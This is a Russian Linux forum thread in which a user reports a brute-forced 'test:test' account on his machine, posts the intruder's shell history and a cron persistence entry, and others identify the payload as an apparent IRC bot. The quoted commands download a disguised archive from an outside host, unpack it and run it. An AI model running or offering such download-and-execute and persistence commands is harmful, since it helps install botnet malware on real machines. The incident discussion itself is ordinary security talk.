Как меня "взломали" (какеры)

Здесь можно поговорить о чём угодно и сколько угодно.

Модератор: Модераторы разделов

Ответить
Аватара пользователя
romuil
Сообщения: 2095
Статус: Ромунцель
ОС: ALTLinux Sisyphus

Как меня "взломали"

Сообщение romuil »

Сижу никого не трогаю, посматриваю сайты и вывод top. Глядь - там под давнишним юзером test:test какая-то нечисть перловая усиленно проц грузит.
грохнул процесс и юзера. В .bash_history осталось

Код: Выделить всё

wget http://teamoana.do.am/x.jpg
tar xzvf x.jpg
rm -rf x.jpg
cd .x
./start nana

Какие какеры унылые нынче.
Спасибо сказали:
Aliech
Сообщения: 952
Статус: дилетант широкого профиля
ОС: Gentoo arm64 musl hardened
Контактная информация:

Re: Как меня "взломали"

Сообщение Aliech »

Это не взлом. Рута то они не получили. А пароль банально побрутать оказалось просто...
С уважением,
Павел Алиев
Спасибо сказали:
Аватара пользователя
Ленивая Бестолочь
Бывший модератор
Сообщения: 2760
ОС: Debian; gentoo

Re: Как меня "взломали"

Сообщение Ленивая Бестолочь »

ботнетег
Солнце садилось в море, а люди с неоконченным высшим образованием выбегали оттуда, думая, что море закипит.
Спасибо сказали:
Аватара пользователя
/dev/random
Администратор
Сообщения: 5282
ОС: Gentoo

Re: Как меня "взломали"

Сообщение /dev/random »

Aliech писал(а):
02.03.2011 21:02
Это не взлом. Рута то они не получили. А пароль банально побрутать оказалось просто...

А им рут и не нужен был. На первый взгляд, в архиве лежит какой-то бот, кажется, IRC. Они просто воспользовались взломанным компом как хостингом.
Спасибо сказали:
Aliech
Сообщения: 952
Статус: дилетант широкого профиля
ОС: Gentoo arm64 musl hardened
Контактная информация:

Re: Как меня "взломали"

Сообщение Aliech »

/dev/random писал(а):
02.03.2011 21:19
Aliech писал(а):
02.03.2011 21:02
Это не взлом. Рута то они не получили. А пароль банально побрутать оказалось просто...

А им рут и не нужен был. На первый взгляд, в архиве лежит какой-то бот, кажется, IRC. Они просто воспользовались взломанным компом как хостингом.

Эт ясно. Вторая часть сообщения - слишком просто им аккаунт сдали. Не зачёт для обеих сторон...
С уважением,
Павел Алиев
Спасибо сказали:
Аватара пользователя
romuil
Сообщения: 2095
Статус: Ромунцель
ОС: ALTLinux Sisyphus

Re: Как меня "взломали"

Сообщение romuil »

Изя уже всё. Так что ой.

Код: Выделить всё

cat /var/spool/cron/test
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Wed Mar  2 19:04:06 2011)
# (Cron version V5.0 -- vixie-cron-4.1.20060426-alt7)
* * * * * /home/test/.x/update >/dev/null 2>&1



Поговорил со знакомым админом большой конторы - он сильно смеялся.
Спасибо сказали:
Аватара пользователя
SmiGes
Сообщения: 146
ОС: Arch Linux

Re: Как меня "взломали"

Сообщение SmiGes »

круто, а где поймал его?
Спасибо сказали:
Ism
Сообщения: 1261
Статус: Никто, по сути быдло

Re: Как меня "взломали"

Сообщение Ism »

wget http://teamoana.do.am/x.jpg
tar xzvf x.jpg
rm -rf x.jpg
cd .x
./start nana


а что в архивчике было ?

а , вообще сам скачал, посмотрел :)
Спасибо сказали:
Ответить